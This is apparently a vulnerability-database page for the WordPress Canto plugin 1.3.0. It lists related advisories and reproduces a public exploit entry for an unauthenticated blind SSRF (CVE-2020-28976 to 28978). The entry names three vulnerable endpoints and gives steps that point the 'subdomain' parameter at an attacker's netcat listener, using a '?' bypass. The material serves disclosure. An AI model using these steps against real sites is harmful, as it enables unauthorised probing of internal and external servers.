| Reporter | Title | Published | Views | Family All 30 |
|---|---|---|---|---|
| CVE-2020-28976 | 14 Nov 202406:07 | – | circl | |
| CVE-2020-28977 | 14 Nov 202406:07 | – | circl | |
| CVE-2020-28978 | 14 Nov 202406:07 | – | circl | |
| WordPress Canto plugin 代码问题漏洞 | 30 Nov 202000:00 | – | cnnvd | |
| WordPress Canto plugin 代码问题漏洞 | 30 Nov 202000:00 | – | cnnvd | |
| WordPress Canto plugin 代码问题漏洞 | 30 Nov 202000:00 | – | cnnvd | |
| WordPress Canto plugin server-side request forgery vulnerability (CNVD-2020-68545) | 1 Dec 202000:00 | – | cnvd | |
| WordPress Canto plugin server-side request forgery vulnerability (CNVD-2020-68546) | 1 Dec 202000:00 | – | cnvd | |
| WordPress Canto plugin server-side request forgery vulnerability | 1 Dec 202000:00 | – | cnvd | |
| WordPress Canto Plugin Server-Side Request Forgery (CVE-2020-28976; CVE-2020-28977; CVE-2020-28978) | 27 Dec 202000:00 | – | checkpoint_advisories |
# Exploit Title: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
# Date: 03/12/2020
# Exploit Author: Pankaj Verma (_p4nk4j)
# Vendor Homepage: https://www.canto.com/integrations/wordpress/
# Software Link: https://github.com/CantoDAM/Canto-Wordpress-Plugin
# Version: 1.3.0
# Tested on: Ubuntu 18.04
# CVE: CVE-2020-28976, CVE-2020-28977, CVE-2020-28978
Description:-
The Canto plugin 1.3.0 for WordPress contains Blind SSRF Vulnerabilities.
It allows an unauthenticated attacker to make a request to any Internal and External Server via "subdomain" parameter.
Vulnerable Parameters and Endpoints:-
https://target/wp-content/plugins/canto/includes/lib/detail.php?subdomain=
https://target/wp-content/plugins/canto/includes/lib/get.php?subdomain=
https://target/wp-content/plugins/canto/includes/lib/tree.php?subdomain=
Steps To Reproduce:-
1. Start a Netcat Listener on any port For e.g. 4499
2. Navigate to "<wordpress_server>/wp-content/plugins/canto/includes/lib/detail.php?subdomain="
3. Add the Attacker's IP and Port For e.g. "172.17.0.1:4499?" to "subdomain=" parameter.
4. Observe the response we got from the Target on Attacker's Listener.
Note:- Using "?" in the payload is mandatory as it acts as a bypass to conduct this attack.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation